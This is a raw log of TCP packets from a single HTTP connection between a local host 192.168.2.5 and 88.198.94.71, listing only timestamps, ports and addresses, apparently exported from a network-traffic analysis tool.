Nov 30, 2022 00:22:31.944937944 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.944948912 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.944973946 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.944983006 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.945008993 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.945015907 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.945044041 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.945053101 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.945080042 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.945089102 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.945116043 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.945126057 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.945149899 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.945157051 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.945184946 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.945193052 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.945219040 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.945229053 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.945255041 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.945262909 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.945301056 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.945657969 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.945693016 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.945714951 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.945730925 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.945765972 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.945766926 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.945780039 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.945802927 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.945811987 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.945838928 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.945852041 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.945873976 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.945882082 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.945909023 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.945923090 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.945944071 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.945952892 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.945980072 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.945986986 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.946013927 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.946024895 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.946050882 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.946057081 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.946085930 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.946094990 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.946120024 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.946130037 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.946156025 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.946161032 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.946192026 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.946199894 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.946227074 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.946233988 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.946261883 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.946268082 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.946296930 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.946302891 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.946332932 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.946337938 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.946368933 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.946377993 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.946403980 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.946413040 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.946441889 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.946444988 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.946477890 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.946480989 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.946521997 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.946866989 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.946924925 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.946927071 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.946964025 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.946970940 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.947000027 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.947006941 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.947036028 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.947042942 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.947072029 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.947076082 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.947108030 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.947113037 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.947145939 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.947154045 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.947184086 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.947196007 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.947220087 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.947227955 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.947254896 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.947259903 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.947292089 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.947303057 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.947335958 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.947345018 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.947381020 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.947390079 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.947419882 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.947423935 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.947455883 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.947463989 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.947491884 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.947500944 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.947536945 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.947581053 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.947617054 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.947632074 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.947650909 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.947659016 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.947686911 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.947694063 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.947721004 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.947731018 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.947760105 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.947763920 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.947793961 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.947805882 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.947829008 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.947839975 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.947863102 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.947870970 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.947897911 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.947906971 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.947947025 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.947949886 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.948050022 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.948195934 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.948232889 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.948251963 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.948271036 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.948276997 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.948307037 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.948312998 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.948347092 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.948359966 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.948385000 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.948421955 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.948435068 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.948435068 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.948458910 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.948467970 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.948498011 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.948503017 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.948534012 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.948542118 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.948573112 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.948577881 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.948601961 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.948630095 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.948657036 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.948684931 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.948719978 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.948724031 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.948760033 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.948785067 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.948800087 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.948812008 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.948838949 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.948847055 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.948882103 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.948920965 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.948960066 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.948966980 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.948997974 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.949007988 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.949034929 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.949040890 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.949073076 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.949080944 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.949119091 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.949140072 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.949182034 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.949187994 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.949225903 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.949584961 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.949621916 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.949651957 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.949660063 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.949668884 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.949697971 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.949707985 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.949738979 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.949748993 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.949776888 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.949785948 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.949814081 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.949825048 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.949852943 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.949862957 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.949903011 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.949903011 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.949939966 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.949948072 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.949978113 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.949985027 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.950015068 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.950022936 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.950052023 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.950057983 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.950090885 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.950095892 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.950129032 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.950136900 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.950165033 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.950170994 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.950202942 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.950211048 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.950239897 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.950244904 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.950277090 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.950284958 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.950314045 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.950319052 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.950351000 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.950357914 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.950388908 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.950395107 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.950426102 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.950432062 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.950464964 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.950470924 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.950510979 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.951548100 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.951586962 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.951623917 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.951623917 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.951646090 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.951663017 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.951699018 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.951704979 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.951704979 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.951740026 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.951776981 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.951786995 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.951814890 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.951829910 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.951853037 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.951859951 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.951906919 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.955286980 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.955646992 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.956311941 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.956353903 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.956379890 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.956392050 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.956403017 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.956432104 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.956433058 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.956470013 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.956473112 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.956506968 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.956511021 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.956547022 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.956551075 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.956584930 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.956593037 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.956624031 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.956631899 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.956661940 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.956666946 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.956698895 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.956707954 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.956739902 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.956743956 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.956784010 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.956937075 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.956973076 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.957010984 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.957025051 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.957046986 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.957084894 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.957117081 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.957123041 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.957125902 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.957138062 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.957165956 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.957170010 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.957206011 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.957211018 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.957242966 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.957279921 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.957314014 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.957346916 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.957346916 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.957350969 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.957381010 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.957387924 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.957406044 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.957427025 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.957431078 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.957465887 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.957483053 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.957515001 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.958153009 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.958178997 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.958203077 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.958220005 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.958245039 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.958255053 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.958271980 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.958283901 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.958288908 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.958307028 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.958332062 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.958350897 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.958358049 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.958379984 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.958399057 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.958453894 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.958477974 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.958497047 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.958502054 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.958517075 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.958528996 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.958540916 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.958553076 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.958565950 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.958578110 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.958590984 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.958601952 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.958616018 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.958626986 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.958640099 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.958651066 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.958667040 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.958676100 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.958688974 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.958702087 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.958715916 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.958728075 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.958753109 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.958769083 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.958890915 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.958913088 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.958937883 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.958956957 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.958976030 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.958978891 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.959017992 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.959023952 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.959048033 CET	80	49710	88.198.94.71	192.168.2.5
